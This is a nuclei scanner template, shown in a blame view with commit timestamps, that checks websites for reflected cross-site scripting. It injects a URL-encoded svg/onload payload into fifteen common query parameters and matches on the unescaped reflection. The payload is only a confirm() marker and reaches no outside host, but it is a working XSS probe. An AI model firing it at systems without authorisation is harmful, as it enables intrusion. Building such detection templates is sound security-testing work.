nuclei-templates/vulnerabilities/generic/top-xss-params.yaml

32 lines
1.6 KiB
YAML
Raw Normal View History

2021-01-09 13:02:04 +00:00
id: top-xss-params
2020-08-15 08:48:23 +00:00
info:
name: Top 15 XSS Check
author: foulenzer & geeknik
2020-08-15 08:48:23 +00:00
severity: medium
description: Searches for reflected XSS in the server response via GET-requests.
tags: xss
2021-04-06 08:15:46 +00:00
parameters: q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p
2020-08-15 08:48:23 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss1%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss2%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss3%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss4%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss5%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss6%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss7%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss8%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss9%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss10%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss11%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss12%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss13%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss14%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E"
2021-04-06 08:15:46 +00:00
redirects: true
max-redirects: 1
2020-09-04 07:49:39 +00:00
matchers-condition: and
2020-08-15 08:48:23 +00:00
matchers:
- type: word
words:
2020-11-26 17:59:40 +00:00
- "<svg/onload=confirm('testing-xss"
2020-09-04 07:46:30 +00:00
part: body
2020-11-26 17:59:40 +00:00
2020-09-04 07:46:30 +00:00
- type: word
words:
2020-12-02 04:31:03 +00:00
- "text/html"
part: header
2021-01-11 06:44:22 +00:00
- type: status
status:
- 200